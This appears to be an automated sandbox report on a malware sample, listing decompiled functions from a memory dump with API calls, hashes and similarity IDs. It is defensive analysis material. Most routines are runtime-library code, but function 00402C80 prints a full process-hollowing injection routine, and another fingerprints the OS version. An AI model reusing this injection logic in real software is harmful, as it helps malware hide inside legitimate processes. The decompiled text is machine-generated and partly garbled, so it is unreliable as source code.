Instruction ID: 0cf3e4382f43b84a2ec2423b953b22f1a6830ebe1ac7756e637711d0cc86f470
Opcode Fuzzy Hash: 3e01b05c512f4a890b66182c45d535113154bbe29e7b3349eca57a800f0e3926
Instruction Fuzzy Hash: AC21A7B2A00215EFCB10DF59C945BAEBBB4FF84728F14456FE610A7291C7799A00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00405D57, Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00405D57(intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr _t17;
				void* _t18;
				void* _t21;
				void* _t24;
				void* _t33;
				void* _t40;
				void* _t41;
				intOrPtr* _t43;
				signed int _t46;
				void* _t48;

				_t40 = __edx;
				E00424FAC(E0042626A, __ecx, __edi, __esi, _t48, __fp0);
				_push(__ecx);
				_push(__ecx);
				_push(__esi);
				_push(__edi);
				_t43 = __ecx;
				_t46 = __ecx + 4;
				if( *((intOrPtr*)(_t46 + 0x4c)) != 0) {
					L3:
					_t46 = 0;
				} else {
					_push(0x40);
					_push(0x22);
					_t21 = E004098DE( *((intOrPtr*)(_t48 + 8))); // executed
					_t54 = _t21;
					if(_t21 == 0) {
						goto L3;
					} else {
						E00405F9A(_t21, _t46, _t21, 1);
						_push(_t48 - 0x14);
						_t24 = E00407CC6(_t46, _t46);
						 *(_t48 - 4) = 0;
						_push(_t24);
						E00405E53(_t46, E00408145(_t46, _t40, _t43, _t46, _t54, __fp0));
						 *(_t48 - 4) =  *(_t48 - 4) | 0xffffffff;
						E004016CC(_t48 - 0x14);
					}
				}
				_push(0);
				_t33 =  *((intOrPtr*)( *_t43 + 4)) + _t43;
				if(_t46 != 0) {
					__eflags =  *((intOrPtr*)(_t33 + 0x38));
					_t41 = 4;
					_t17 =  ==  ? _t41 : 0;
					__eflags = _t17;
					_push(_t17);
					_t18 = E00402152(_t33);
				} else {
					_push( *(_t33 + 0xc) | 0x00000002);
					_t18 = E004074A6(_t33);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t48 - 0xc));
				return _t18;
			}

0x00405d57
0x00405d5c
0x00405d61
0x00405d62
0x00405d64
0x00405d65
0x00405d66
0x00405d6a
0x00405d70
0x00405dba
0x00405dba
0x00405d72
0x00405d72
0x00405d74
0x00405d79
0x00405d81
0x00405d83
0x00000000
0x00405d85
0x00405d8a
0x00405d94
0x00405d95
0x00405d9a
0x00405d9d
0x00405da7
0x00405dac
0x00405db3
0x00405db3
0x00405d83
0x00405dbe
0x00405dc2
0x00405dc6
0x00405dd8
0x00405ddd
0x00405dde
0x00405dde
0x00405de1
0x00405de2
0x00405dc8
0x00405dce
0x00405dcf
0x00405dcf
0x00405ded
0x00405df7

APIs

__EH_prolog.LIBCMT ref: 00405D5C

Part of subcall function 00407CC6: __EH_prolog.LIBCMT ref: 00407CCB

Part of subcall function 00408145: __EH_prolog.LIBCMT ref: 0040814A
Part of subcall function 00408145: std::_Lockit::_Lockit.LIBCPMT ref: 00408159
Part of subcall function 00408145: std::locale::_Getfacet.LIBCPMT ref: 00408179
Part of subcall function 00408145: std::_Lockit::~_Lockit.LIBCPMT ref: 004081D3

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$Lockitstd::_$GetfacetLockit::_Lockit::~_std::locale::_
String ID:
API String ID: 3055501177-0
Opcode ID: e35d9c389ed8e3b10036dd90eb3c5e75cd6061a7f0f5cd09b79e361189b319ee
Instruction ID: 9a8ec831e4f72e1ea0c2aca2b1612bb9280bf912e30b1f9f54e961a17209c980
Opcode Fuzzy Hash: e35d9c389ed8e3b10036dd90eb3c5e75cd6061a7f0f5cd09b79e361189b319ee
Instruction Fuzzy Hash: CC11E7B1B00515AFDB14EB65CD86E6FB769EF40314F10853FB505B72C1DB389D018A69

Uniqueness

Uniqueness Score: -1.00%

Function 0041C3AE, Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0041C3AE(void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed short* _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v8;
				char _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				void* _t25;

				E0041C16A( &_v32, _a8);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_v12 != 0) {
					_t25 = E004233EB( &_v8, _a4, _v20, _a12, 0x180); // executed
					if(_t25 != 0) {
						goto L1;
					}
					 *0x4397d4 =  *0x4397d4 + 1;
					asm("lock or [eax], ecx");
					 *((intOrPtr*)(_a16 + 8)) = 0;
					 *((intOrPtr*)(_a16 + 0x1c)) = 0;
					 *((intOrPtr*)(_a16 + 4)) = 0;
					 *_a16 = 0;
					 *((intOrPtr*)(_a16 + 0x10)) = _v8;
					return _a16;
				}
				L1:
				return 0;
			}

0x0041c3bf
0x0041c3cb
0x0041c3cc
0x0041c3cd
0x0041c3d4
0x0041c3ec
0x0041c3f6
0x00000000
0x00000000
0x0041c3fb
0x0041c407
0x0041c40f
0x0041c415
0x0041c41b
0x0041c421
0x0041c429
0x00000000
0x0041c42c
0x0041c3d6
0x00000000

APIs

__wsopen_s.LIBCMT ref: 0041C3EC

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: a455a1be86750fbb9600d10f5ac8fffafc35bb2389159bcf8065ec40d76ded39
Instruction ID: 4043055d5d698d02c3ff619592a1a15ab6250c6f95317e25e996ffc08d540dbf
Opcode Fuzzy Hash: a455a1be86750fbb9600d10f5ac8fffafc35bb2389159bcf8065ec40d76ded39
Instruction Fuzzy Hash: 0C11367190410AAFCB05DF59E9819DB7BF5EF48300F00406AF809AB351D771EA118B69

Uniqueness

Uniqueness Score: -1.00%

Function 0041F136, Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0041F136(void* __esi, void* __eflags) {
				intOrPtr _v12;
				void* __ecx;
				char _t16;
				void* _t17;
				void* _t26;
				void* _t28;
				void* _t30;
				char _t31;
				void* _t33;
				intOrPtr* _t35;

				_push(_t26);
				_push(_t26);
				_t16 = E00414C69(_t26, 0x40, 0x30); // executed
				_t31 = _t16;
				_v12 = _t31;
				_t28 = _t30;
				if(_t31 != 0) {
					_t2 = _t31 + 0xc00; // 0xc00
					_t17 = _t2;
					__eflags = _t31 - _t17;
					if(__eflags != 0) {
						_t3 = _t31 + 0x20; // 0x20
						_t35 = _t3;
						_t33 = _t17;
						do {
							_t4 = _t35 - 0x20; // 0x0
							E0041A1D9(_t28, __eflags, _t4, 0xfa0, 0);
							 *(_t35 - 8) =  *(_t35 - 8) | 0xffffffff;
							 *_t35 = 0;
							_t35 = _t35 + 0x30;
							 *((intOrPtr*)(_t35 - 0x2c)) = 0;
							 *((intOrPtr*)(_t35 - 0x28)) = 0xa0a0000;
							 *((char*)(_t35 - 0x24)) = 0xa;
							 *(_t35 - 0x23) =  *(_t35 - 0x23) & 0x000000f8;
							 *((char*)(_t35 - 0x22)) = 0;
							__eflags = _t35 - 0x20 - _t33;
						} while (__eflags != 0);
						_t31 = _v12;
					}
				} else {
					_t31 = 0;
				}
				E004155C5(0);
				return _t31;
			}

0x0041f13b
0x0041f13c
0x0041f143
0x0041f148
0x0041f14c
0x0041f150
0x0041f153
0x0041f159
0x0041f159
0x0041f15f
0x0041f161
0x0041f164
0x0041f164
0x0041f167
0x0041f169
0x0041f16f
0x0041f173
0x0041f178
0x0041f17c
0x0041f17e
0x0041f181
0x0041f187
0x0041f18e
0x0041f192
0x0041f196
0x0041f199
0x0041f199
0x0041f19d
0x0041f1a0
0x0041f155
0x0041f155
0x0041f155
0x0041f1a2
0x0041f1af

APIs

Part of subcall function 00414C69: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00418D26,00000001,00000364,?,?,0040B7C7,?,?,?,?,?,0040118F), ref: 00414CAA

_free.LIBCMT ref: 0041F1A2

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 0d44a698e295fe69bfc716219d788f5a82d7d06741deb42ed9ea5c0bafeae0e0
Instruction ID: eeb2781f3e782c62097f1bcbb52cf4ad09cca0aedfaf8023eb67dd60c8d030f9
Opcode Fuzzy Hash: 0d44a698e295fe69bfc716219d788f5a82d7d06741deb42ed9ea5c0bafeae0e0
Instruction Fuzzy Hash: 47012B72200304ABE3218E66DC859DAFBE9EBC5370F25062EE58593280E6346C468668

Uniqueness

Uniqueness Score: -1.00%

Function 0041330A, Relevance: 1.5, APIs: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041330A(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _t13;
				void* _t16;
				signed int _t25;
				signed int _t26;
				intOrPtr _t28;

				_t28 = _a4;
				if(_t28 == 0) {
					 *((intOrPtr*)(E00413C2D())) = 0x16;
					return E00413708() | 0xffffffff;
				}
				_push(_t25);
				_t26 = _t25 | 0xffffffff;
				if(( *(_t28 + 0xc) >> 0x0000000d & 0x00000001) != 0) {
					_t13 = E00413123(__edx, _t28); // executed
					_t26 = _t13;
					E00419AFD(_t28);
					_t16 = E00419885(E004183D2(_t28)); // executed
					if(_t16 >= 0) {
						if( *(_t28 + 0x1c) != 0) {
							E004155C5( *(_t28 + 0x1c));
							 *(_t28 + 0x1c) =  *(_t28 + 0x1c) & 0x00000000;
						}
					} else {
						_t26 = _t26 | 0xffffffff;
					}
				}
				E004199FF(_t28);
				return _t26;
			}

0x00413310
0x00413315
0x0041331c
0x00000000
0x00413327
0x0041332f
0x00413330
0x00413338
0x0041333b
0x00413341
0x00413343
0x0041334f
0x00413359
0x00413364
0x00413369
0x0041336e
0x00413372
0x0041335b
0x0041335b
0x0041335b
0x00413359
0x00413374
0x00000000

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb3411cea9385e105fd2df3557b6322d0cf596f45c834ec58b5d7b18aee92310
Instruction ID: a04a23a4b2bda6d972e9010241e2837171d7b592fc87817c8d2e986776a716f4
Opcode Fuzzy Hash: bb3411cea9385e105fd2df3557b6322d0cf596f45c834ec58b5d7b18aee92310
Instruction Fuzzy Hash: 22F0F93250061866C6213E7ADC066DB37988F8237AF10071FF875921D1CE7CDB8245ED

Uniqueness

Uniqueness Score: -1.00%

Function 00414C69, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00414C69(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x439d60, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00417B81();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00413C2D())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E0041582E(_t15, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x00414c69
0x00414c6f
0x00414c74
0x00414c82
0x00414c82
0x00414c88
0x00414c8a
0x00414c8a
0x00414ca1
0x00414caa
0x00414cb2
0x00000000
0x00000000
0x00414c92
0x00414c94
0x00414cb6
0x00414cbb
0x00414cc1
0x00000000
0x00414cc1
0x00414c97
0x00414c9c
0x00414c9d
0x00414c9f
0x00000000
0x00000000
0x00414c9f
0x00000000
0x00414ca1
0x00414c7a
0x00414c80
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00418D26,00000001,00000364,?,?,0040B7C7,?,?,?,?,?,0040118F), ref: 00414CAA

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 50f8293d27b1f67e5b8c05326bb0fa2d6d5cd7918d4fd99f6e39cb39687f0990
Instruction ID: 0cff8ff422a39850cc1380340d11710e52102d05e884fb14b49d8bd4da076064
Opcode Fuzzy Hash: 50f8293d27b1f67e5b8c05326bb0fa2d6d5cd7918d4fd99f6e39cb39687f0990
Instruction Fuzzy Hash: E8F024316065246AAB31AF229D05ADB378C9FC13F0B164123AC08DA280EA28DC8182ED

Uniqueness

Uniqueness Score: -1.00%

Function 00415216, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00415216(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00413C2D())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x439d60, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00417B81();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E0041582E(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x00415216
0x0041521c
0x00415222
0x00415254
0x00415259
0x0041525f
0x00000000
0x0041525f
0x00415226
0x00415228
0x00415228
0x0041523f
0x00415248
0x00415250
0x00000000
0x00000000
0x00415230
0x00415232
0x00000000
0x00000000
0x00415235
0x0041523a
0x0041523b
0x0041523d
0x00000000
0x00000000
0x0041523d
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,?,?,0040B7C7,?,?,?,?,?,0040118F,?,00000001), ref: 00415248

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 422ec9016387e0ec625abcdb5a3ac128ced72c730a4fc8512070eb60731d6652
Instruction ID: 69fa7e8657786b4eb1dd7edaaa13c037aa8578a4422f22fde658804f2184cafa
Opcode Fuzzy Hash: 422ec9016387e0ec625abcdb5a3ac128ced72c730a4fc8512070eb60731d6652
Instruction Fuzzy Hash: 4BE0E533604D20DAE6313622AC01BDB77489FC23B4F1400A3AC5596280CB3CDC8089ED

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00402C80, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 194
injectionthreadmemoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00402C80(void* __ecx, long __edx, CONTEXT* __edi, void* __esi, void* __fp0) {
				void* _t78;
				void* _t100;
				long _t108;
				_Unknown_base(*)()* _t119;
				void* _t122;
				signed int _t135;
				long _t136;
				intOrPtr _t139;
				void* _t144;
				intOrPtr* _t150;
				void* _t151;
				void* _t153;
				void* _t154;

				_t141 = __edi;
				_t136 = __edx;
				E00424FAC(E00425FD0, __ecx, __edi, __esi, _t151, __fp0);
				_t154 = _t153 - 0x9c;
				_push(__esi);
				_push(__edi);
				 *(_t151 - 0x34) = _t136;
				_t122 = __ecx;
				 *(_t151 - 4) =  *(_t151 - 4) & 0x00000000;
				_push(E004033B3);
				_push(E00403459);
				_push(1);
				_push(0x18);
				_push(_t151 - 0x4c);
				E0040AC0F(_t136,  *(_t151 - 4));
				 *(_t151 - 4) = 1;
				_t78 = E00402BFC(_t151 - 0x64, _t136, __edi, __esi,  *(_t151 - 4), __fp0);
				 *(_t151 - 4) = 2;
				E004033E2(_t151 - 0x4c, _t78);
				 *(_t151 - 4) = 1;
				E0040572F(_t151 - 0x64, 1, 0);
				while( *_t122 == 0x5a4d) {
					_t150 =  *((intOrPtr*)(_t122 + 0x3c)) + _t122;
					if( *_t150 == 0x4550) {
						E0040BDD0(_t141, _t151 - 0xa8, 0, 0x44);
						asm("stosd");
						_t154 = _t154 + 0xc;
						_t131 =  >=  ?  *((void*)(_t151 + 8)) : _t151 + 8;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t91 =  >=  ?  *((void*)(_t151 - 0x4c)) : _t151 - 0x4c;
						_t136 = 0;
						if(CreateProcessW( >=  ?  *((void*)(_t151 - 0x4c)) : _t151 - 0x4c,  >=  ?  *((void*)(_t151 + 8)) : _t151 + 8, 0, 0, 0, 0x8000004, 0, 0, _t151 - 0xa8, _t151 - 0x1c) != 0) {
							_t141 = VirtualAlloc(0, 4, 0x1000, 4);
							 *(_t151 - 0x30) = _t141;
							_t141->ContextFlags = 0x10007;
							if(GetThreadContext( *(_t151 - 0x18), _t141) != 0) {
								ReadProcessMemory( *(_t151 - 0x1c), _t141->Ebx + 8, _t151 - 0x20, 4, 0);
								if( *(_t151 - 0x20) ==  *(_t150 + 0x34)) {
									_t119 = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
									 *_t119( *(_t151 - 0x1c),  *(_t151 - 0x20));
								}
								_t100 = VirtualAllocEx( *(_t151 - 0x1c),  *(_t150 + 0x34),  *(_t150 + 0x50), 0x3000, 0x40);
								 *(_t151 - 0x2c) = _t100;
								_push(0);
								if(_t100 != 0) {
									WriteProcessMemory( *(_t151 - 0x1c), _t100, _t122,  *(_t150 + 0x54), ??);
									 *(_t151 - 0x24) =  *(_t151 - 0x24) & 0x00000000;
									__eflags = 0 -  *(_t150 + 6);
									if(0 <  *(_t150 + 6)) {
										_t144 =  *(_t151 - 0x2c);
										_t139 = 0;
										__eflags = 0;
										 *((intOrPtr*)(_t151 - 0x28)) = 0;
										do {
											WriteProcessMemory( *(_t151 - 0x1c),  *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x3c)) + _t139 + _t122 + 0x104)) + _t144,  *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x3c)) + _t139 + _t122 + 0x10c)) + _t122,  *( *((intOrPtr*)(_t122 + 0x3c)) + _t139 + _t122 + 0x108), 0);
											_t135 =  *(_t151 - 0x24) + 1;
											_t139 =  *((intOrPtr*)(_t151 - 0x28)) + 0x28;
											 *(_t151 - 0x24) = _t135;
											 *((intOrPtr*)(_t151 - 0x28)) = _t139;
											__eflags = _t135 - ( *(_t150 + 6) & 0x0000ffff);
										} while (_t135 < ( *(_t150 + 6) & 0x0000ffff));
										_t141 =  *(_t151 - 0x30);
									}
									WriteProcessMemory( *(_t151 - 0x1c), _t141->Ebx + 8, _t150 + 0x34, 4, 0);
									_t108 =  *((intOrPtr*)(_t150 + 0x28)) +  *(_t151 - 0x2c);
									__eflags = _t108;
									_t141->Eax = _t108;
									SetThreadContext( *(_t151 - 0x18), _t141);
									ResumeThread( *(_t151 - 0x18));
								} else {
									TerminateProcess( *(_t151 - 0x1c), ??);
									continue;
								}
							}
						}
					}
					break;
				}
				VirtualFree(0, 4, 0x8000);
				__eflags =  *(_t151 - 0x34);
				_t147 =  ==  ?  *(_t151 - 0x1c) :  *((intOrPtr*)(_t151 - 0x14));
				 *(_t151 - 4) = 0;
				_push(E004033B3);
				_push(1);
				_push(0x18);
				_push(_t151 - 0x4c);
				E0040A88F(_t136,  *(_t151 - 0x34));
				_t70 = _t151 - 4;
				 *_t70 =  *(_t151 - 4) | 0xffffffff;
				__eflags =  *_t70;
				E0040572F(_t151 + 8, 1, 0);
				_t86 =  ==  ?  *(_t151 - 0x1c) :  *((intOrPtr*)(_t151 - 0x14));
				 *[fs:0x0] =  *((intOrPtr*)(_t151 - 0xc));
				return  ==  ?  *(_t151 - 0x1c) :  *((intOrPtr*)(_t151 - 0x14));
			}

0x00402c80
0x00402c80
0x00402c85
0x00402c8a
0x00402c91
0x00402c92
0x00402c93
0x00402c96
0x00402c98
0x00402c9f
0x00402ca4
0x00402ca9
0x00402cab
0x00402cad
0x00402cae
0x00402cb3
0x00402cba
0x00402cbf
0x00402cc7
0x00402ccc
0x00402cd7
0x00402cdc
0x00402ced
0x00402cf5
0x00402d06
0x00402d10
0x00402d14
0x00402d1e
0x00402d26
0x00402d2f
0x00402d30
0x00402d34
0x00402d38
0x00402d4e
0x00402d65
0x00402d68
0x00402d6b
0x00402d7c
0x00402d97
0x00402da3
0x00402db6
0x00402dc2
0x00402dc2
0x00402dd4
0x00402dda
0x00402ddd
0x00402de1
0x00402df9
0x00402dff
0x00402e05
0x00402e09
0x00402e0b
0x00402e0e
0x00402e0e
0x00402e10
0x00402e13
0x00402e38
0x00402e44
0x00402e49
0x00402e4c
0x00402e4f
0x00402e52
0x00402e52
0x00402e56
0x00402e56
0x00402e6e
0x00402e77
0x00402e77
0x00402e7b
0x00402e84
0x00402e8d
0x00402de3
0x00402de6
0x00000000
0x00402de6
0x00402de1
0x00402d7c
0x00402d4e
0x00000000
0x00402cf5
0x00402e9c
0x00402ea5
0x00402ea9
0x00402ead
0x00402eb4
0x00402eb9
0x00402ebb
0x00402ebd
0x00402ebe
0x00402ec3
0x00402ec3
0x00402ec3
0x00402ece
0x00402ed6
0x00402edb
0x00402ee5

APIs

__EH_prolog.LIBCMT ref: 00402C85

Part of subcall function 00402BFC: __EH_prolog.LIBCMT ref: 00402C01
Part of subcall function 00402BFC: GetCurrentProcess.KERNEL32(00000000,?,?), ref: 00402C34
Part of subcall function 00402BFC: QueryFullProcessImageNameW.KERNEL32(00000000), ref: 00402C3B

Part of subcall function 0040572F: std::_Deallocate.LIBCONCRT ref: 0040575F

CreateProcessW.KERNEL32 ref: 00402D46
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00402D5F
GetThreadContext.KERNEL32(?,00000000), ref: 00402D74
ReadProcessMemory.KERNEL32(00000008,?,?,00000004,00000000), ref: 00402D97
GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 00402DAF
GetProcAddress.KERNEL32(00000000), ref: 00402DB6
VirtualAllocEx.KERNEL32(00000008,?,?,00003000,00000040), ref: 00402DD4
TerminateProcess.KERNEL32(00000008,00000000), ref: 00402DE6
WriteProcessMemory.KERNEL32(00000008,00000000,?,?,00000000), ref: 00402DF9
WriteProcessMemory.KERNEL32(00000008,?,?,?,00000000,?,?,00000000), ref: 00402E38
WriteProcessMemory.KERNEL32(00000008,?,?,00000004,00000000,?,?,00000000), ref: 00402E6E
SetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 00402E84
ResumeThread.KERNEL32(?,?,?,00000000), ref: 00402E8D
VirtualFree.KERNEL32(00000000,00000004,00008000,00000001,00000000,?,00000018,00000001,Function_00003459,Function_000033B3), ref: 00402E9C

Strings

NtUnmapViewOfSection, xrefs: 00402DA5
ntdll.dll, xrefs: 00402DAA

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Process$Memory$ThreadVirtualWrite$AllocContextH_prolog$AddressCreateCurrentDeallocateFreeFullHandleImageModuleNameProcQueryReadResumeTerminatestd::_
String ID: NtUnmapViewOfSection$ntdll.dll
API String ID: 3210913272-1050664331
Opcode ID: 925ee5182bf2ab23837c4b600ba5bb5942a74ec35036d6b734eb5e139d0e01f5
Instruction ID: e7f81e0218263eab05c318e1222e6eabb462f312c34f14715b7902576f5a0b0d
Opcode Fuzzy Hash: 925ee5182bf2ab23837c4b600ba5bb5942a74ec35036d6b734eb5e139d0e01f5
Instruction Fuzzy Hash: 6B716A71A40208AFEB20DF94DD45BEEBBB9EF48705F108069F605B61D1C7B8A945CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00402B64, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00402B64(void* __ecx, void* __edx, void* __eflags) {
				char _v8;
				struct _SYSTEM_INFO _v44;
				void* __edi;
				void* _t14;
				void* _t16;
				void* _t19;
				intOrPtr* _t20;
				signed int _t22;
				intOrPtr* _t27;
				void* _t28;

				_t20 = E0040A85C(__ecx, __edx, __eflags, 0x11c);
				E0040BDD0(_t28, _t20, 0, 0x11c);
				 *_t20 = 0x11c;
				_t27 = GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlGetVersion");
				_t22 = 9;
				memset( &_v44, 0, _t22 << 2);
				if(_t27 != 0) {
					_t14 =  *_t27(_t20);
					__eflags = _t14;
					if(_t14 != 0) {
						goto L1;
					} else {
						GetSystemInfo( &_v44);
						__imp__GetProductInfo( *((intOrPtr*)(_t20 + 4)),  *((intOrPtr*)(_t20 + 8)), 0, 0,  &_v8);
						_push(0x11c);
						_t19 = E0040ABDE(_t20);
						__eflags =  *((intOrPtr*)(_t20 + 4)) - 6;
						asm("sbb eax, eax");
						_t16 = _t19 + 1;
						__eflags = _t16;
					}
				} else {
					L1:
					_push(0x11c);
					E0040ABDE(_t20);
					_t16 = 0;
				}
				return _t16;
			}

0x00402b79
0x00402b7e
0x00402b86
0x00402b9f
0x00402ba8
0x00402ba9
0x00402bad
0x00402bbb
0x00402bbd
0x00402bbf
0x00000000
0x00402bc1
0x00402bc5
0x00402bd9
0x00402be2
0x00402be8
0x00402bed
0x00402bf0
0x00402bf2
0x00402bf2
0x00402bf2
0x00402baf
0x00402baf
0x00402baf
0x00402bb1
0x00402bb6
0x00402bb6
0x00402bfb

APIs

new.LIBCMT ref: 00402B73
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00402B8D
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00402B99
GetSystemInfo.KERNEL32(?), ref: 00402BC5
GetProductInfo.KERNEL32(?,?,00000000,00000000,?), ref: 00402BD9

Strings

RtlGetVersion, xrefs: 00402B93
ntdll.dll, xrefs: 00402B88

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Info$AddressHandleModuleProcProductSystem
String ID: RtlGetVersion$ntdll.dll
API String ID: 2312756217-1489217083
Opcode ID: e42525c40718b3c8a36ab49a543e0ea26fa4fa7ea60dd6e85e35a4e1c44a6ceb
Instruction ID: 5e335306953ba00de6490ff3ba30764ba95e0ef2744806e3b75519323116a9b9
Opcode Fuzzy Hash: e42525c40718b3c8a36ab49a543e0ea26fa4fa7ea60dd6e85e35a4e1c44a6ceb
Instruction Fuzzy Hash: 7B010872B443047AEB103E759C46FDB7BACDB08311F104476FA05F61C2EA79E50542AD

Uniqueness

Uniqueness Score: -1.00%

Function 00421381, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00421381(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t12 = _a8 + 8; // 0xfde8fe81
					if(GetLocaleInfoW( *_t12, 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x42e1e0;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x42e1e8;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E004183A8(_t23, _t23);
									goto L25;
								}
								_t8 = _a8 + 8; // 0xfde8fe81
								if(GetLocaleInfoW( *_t8, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

0x00421386
0x00421387
0x0042138e
0x00421432
0x00421440
0x0042144b
0x00421451
0x00421456
0x00421458
0x00421458
0x0042145e
0x00421463
0x00421463
0x0042144d
0x0042144d
0x00000000
0x0042144d
0x00421394
0x00421399
0x00000000
0x00000000
0x0042139f
0x004213a4
0x004213a6
0x004213a6
0x004213ac
0x00000000
0x00000000
0x004213b1
0x004213c8
0x004213c8
